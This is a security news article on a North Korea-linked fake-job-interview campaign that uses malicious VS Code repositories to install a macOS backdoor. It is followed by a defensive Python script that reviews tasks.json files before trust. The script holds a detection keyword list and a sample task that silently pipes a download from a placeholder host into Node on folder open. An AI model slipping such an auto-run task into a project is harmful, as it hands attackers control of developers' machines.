DPRK-Linked Contagious Interview Campaign Expands Use Of Microsoft Visual Studio Code Backdoors

New research shows North Korea-aligned actors continue abusing developer workflows to deliver stealthy macOS malware.

Published on Jan 20, 2026

Threat actors linked to North Korea are continuing to evolve the long-running “Contagious Interview” campaign, introducing a previously undocumented backdoor technique that targets developers through Microsoft Visual Studio Code (VSC).

Recent analysis by Jamf Threat Labs, with supporting technical research from OpenSourceMalware, shows a steady progression toward deeper integration with legitimate development tools.

The campaign is known for using fake recruitment scenarios to lure software developers into cloning malicious Git repositories. These repositories, usually hosted on popular code-sharing platforms, are introduced as coding challenges or interview assignments.

When opened in VSC, the projects prompt users to trust the repository author, a step that enables automated processing of configuration files.

Earlier stages of the campaign relied on ClickFix-style techniques and VSC tasks.json files to execute arbitrary commands. More recent activity shows attackers expanding these methods by embedding heavily obfuscated JavaScript and, in the latest iteration, deploying a persistent backdoor implant.

Microsoft Visual Studio Code as an Initial Access Vector

In observed macOS infections, opening a malicious repository triggers a background shell process that downloads a remote JavaScript payload and executes it using the Node.js runtime. The process is designed to run independently of the VSC session and suppress visible output, making detection difficult for users.

The JavaScript payload implements core backdoor functionality, including system fingerprinting, persistent command-and-control (C2) communication, and remote code execution (RCE).

Hostname, network identifiers, operating system details, and public IP address information are collected to uniquely identify each compromised system. The backdoor then beacons to a remote server at frequent intervals, awaiting additional instructions.

The researchers also observed follow-on activity several minutes after initial infection, where additional JavaScript established a more traditional backdoor with process management and cleanup capabilities. This design allows operators to deploy further tooling, execute arbitrary code, or terminate activity remotely if needed.

“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf Threat Labs warned.

“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources. Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents.”
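The trust prompt described above matters because VS Code only processes a repository's `.vscode/tasks.json` once the folder is trusted, and a task can be configured to run automatically at that moment. As an added example (not code from the article, Jamf Threat Labs or OpenSourceMalware) of the review step the researchers recommend, the Python script below statically inspects a cloned repository's tasks.json and flags tasks that auto-run on folder open, hide their terminal output, or run commands that fetch and execute remote code; the sample tasks.json, its `example.invalid` URL and the keyword list are constructed for illustration.

```python
"""Static review of a cloned repository's .vscode/tasks.json before trusting it in VS Code."""
import json
import re

# Command fragments worth a second look: remote download, Node execution, backgrounding, hidden output.
SUSPICIOUS_PATTERNS = [r"\bcurl\b", r"\bwget\b", r"\bnode\b", r"\bnohup\b",
                       r"/dev/null", r"&\s*$", r"base64", r"\beval\b"]

# Matches a JSON string first, so // and /* */ inside string values (e.g. URLs) are never removed.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop comments outside strings, then trailing commas before } or ]."""
    text = _JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)
    # Trailing-comma removal is a simplification: it is applied to string contents as well.
    return re.sub(r",\s*([}\]])", r"\1", text)

def review_tasks(text: str) -> list:
    """Return one finding per task that auto-runs, hides output, or runs a suspicious command."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs when the folder is opened and trusted")
        pres = task.get("presentation", {})
        if pres.get("reveal") == "never" or pres.get("echo") is False:
            reasons.append("hides its terminal output")
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd)]
        if hits:
            reasons.append("command matches: " + ", ".join(hits))
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"), "command": cmd, "reasons": reasons})
    return findings

# Constructed sample modelled on the behaviour the article describes; the URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{ // constructed sample; comments and trailing commas are valid in tasks.json
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "prepare", "type": "shell",
      "command": "sh -c 'curl -s https://example.invalid/p.js | node' >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false }, }
  ]
}'''

if __name__ == "__main__":
    for f in review_tasks(SAMPLE_TASKS_JSON):
        print(f["label"], "->", "; ".join(f["reasons"]))
```

Run it against the `.vscode/tasks.json` of a freshly cloned repository before clicking "trust"; any finding is a reason to read the task by hand rather than let VS Code execute it.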